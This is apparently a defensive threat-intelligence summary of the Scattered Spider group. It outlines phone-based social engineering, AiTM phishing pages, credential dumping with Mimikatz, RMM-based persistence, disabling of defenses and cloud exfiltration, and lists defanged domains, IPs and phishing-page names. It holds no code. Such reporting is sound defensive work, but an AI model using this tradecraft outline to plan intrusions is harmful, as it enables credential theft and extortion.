Keypoints
- Scattered Spider primarily uses tailored phone-based social engineering (voice phishing, smishing, MFA bombing, SIM swapping) to harvest credentials and bypass MFA.
- Credential harvesting is performed via targeted AiTM/phishing pages that collect passwords and 2FA codes (e.g., submissions routed through pages like fuckyou.php and factor.php).
- Once inside, actors use stolen credentials, RMM tools (AnyDesk, RemotePC, etc.), VPNs and remote services to establish persistence and lateral movement.
- Data exfiltration relies on legitimate cloud and file‑sharing services (Rclone, MEGAsync/MEGA, DropBox, transfer[.]sh, AWS S3) to host large data dumps and avoid burning infrastructure.
- Scattered Spider evolved from an access broker to a BlackCat ransomware affiliate, adding ransomware deployment and double‑extortion tactics to its playbook.
- Phishing infrastructure is highly transient: domains are registered via registrars like registrar[.]eu, go live for hours–days, then are replaced to evade detection.
MITRE Techniques
- [T1566.002] Spearphishing Link – Used to direct victims “to a credential harvesting site” and collect credentials via targeted phishing pages (‘redirected to the “factor.html” page, which prompts the user for what we assess to be a 2FA code’).
- [T1204.002] User Execution: Malicious Link – Phone- and SMS-based social engineering (smishing, voice calls, Telegram) used to coerce users into visiting phishing pages (‘targeted employees with phishing, including smishing and phone calls’).
- [T1078] Valid Accounts – Compromised credentials were reused for access to cloud and enterprise accounts (“accessed Azure account using stolen credentials”; “took over user accounts”).
- [T1021] Remote Services – Legitimate RMM and remote tools (AnyDesk, RemotePC, RDP, Chrome Remote Desktop) used for persistence and lateral movement (“Distributed the commercial RMM tool AnyDesk”; “RMM tools … for establishing persistence”).
- [T1003] Credential Dumping – Use of credential‑harvesting and dumping tools (Mimikatz, ProcDump) to extract account secrets (“Mimikatz, ProcDump” listed among tools for credential access).
- [T1562.001] Impair Defenses: Disable or Modify Security Tools – Actors deleted backups and disabled security tooling to hinder recovery and detection (“Deleted shadow copies, disabled security tools”).
- [T1567.002] Exfiltration to Cloud Storage – Exfiltration conducted via cloud/file‑sharing services and sync clients (Rclone, MEGAsync/MEGA, DropBox, transfer[.]sh, AWS S3) to host stolen data (“exfiltrated data using Rclone, MEGAsync, FileZilla or DropBox”).
Indicators of Compromise
- [Phishing domains] targeted company credential pages – linkedinsso[.]com, bell-hr[.]com, and 40+ other domains used to host short-lived phishing pages.
- [Phishing server IPs] hosting phishing infrastructure – 149.248.14[.]222, 149.28.105[.]251, and ~25 additional IPs observed serving phishing content.
- [Phishing page filenames] credential collection endpoints – fuckyou.php, factor.php (used to receive credentials and 2FA codes before redirection).
- [Cloud/file-sharing services] exfiltration destinations – MEGAsync (MEGA), transfer[.]sh, and Rclone-backed destinations (also DropBox, AWS S3) used to stage stolen data.
- [Registrar] domain registration pattern – registrar[.]eu identified as the registrar used for recent phishing domains.
Scattered Spider’s technical procedures focus on phone-based social engineering to harvest credentials, then leverage legitimate remote-access tooling and stolen credentials to move inside networks and maintain persistence. Initial access campaigns use targeted AiTM/phishing pages that immediately capture passwords and 2FA codes (forms submit to endpoints such as fuckyou.php and factor.php), with phishing domains registered via registrars like registrar[.]eu and rotated quickly—often lasting hours or days. Actors commonly reuse purchased or stolen credentials and deploy RMM tools (AnyDesk, RemotePC, Chrome Remote Desktop, RDP tunnelling) or VPN access for command-and-control and lateral movement.
For reconnaissance and escalation they employ public and commodity tools (credential dumpers like Mimikatz/ProcDump, privilege escalation and discovery scripts, and IAM abuse) and frequently disable defenses and backups to hinder detection and recovery. Data exfiltration is performed using widely available cloud and file‑sharing services—Rclone, MEGAsync/MEGA, DropBox, transfer[.]sh, and AWS S3—allowing large-volume transfers to anonymous or resilient storage; this supports subsequent double‑extortion via BlackCat ransomware deployments on Windows, Linux, and ESXi systems.
Operationally, the group evolved from selling access to others into full ransomware affiliate operations, combining tailored social engineering, credential theft, persistent remote access through RMM and tunnelling, defensive countermeasures, and cloud-based exfiltration to maximise monetisation. Monitoring short‑lived phishing domains, associated IP infrastructure, and the specific phishing page artifacts (e.g., form endpoints and redirection patterns) is critical for early detection and disruption.
Read more: https://blog.sekoia.io/scattered-spider-laying-new-eggs/